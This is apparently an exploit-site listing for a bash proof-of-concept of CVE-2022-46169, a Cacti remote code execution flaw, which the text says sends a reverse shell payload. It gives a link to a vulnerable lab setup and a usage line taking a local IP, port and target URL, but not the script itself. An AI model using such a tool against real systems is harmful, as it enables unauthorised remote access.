Share
## https://sploitus.com/exploit?id=FA4878F5-0A97-521E-9195-FDA935E52BC9
# SHELL-POC-CVE-2022-46169

## A bash proof of concept of the CVE-2022-46169 sendind a revserse shell payload.
## To make a vulnerable environement on your own, visit this repo : https://github.com/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application.


# Usage : 
```
./poc.sh -i <localIP> -p <localPort> -u <vulnerable link>
```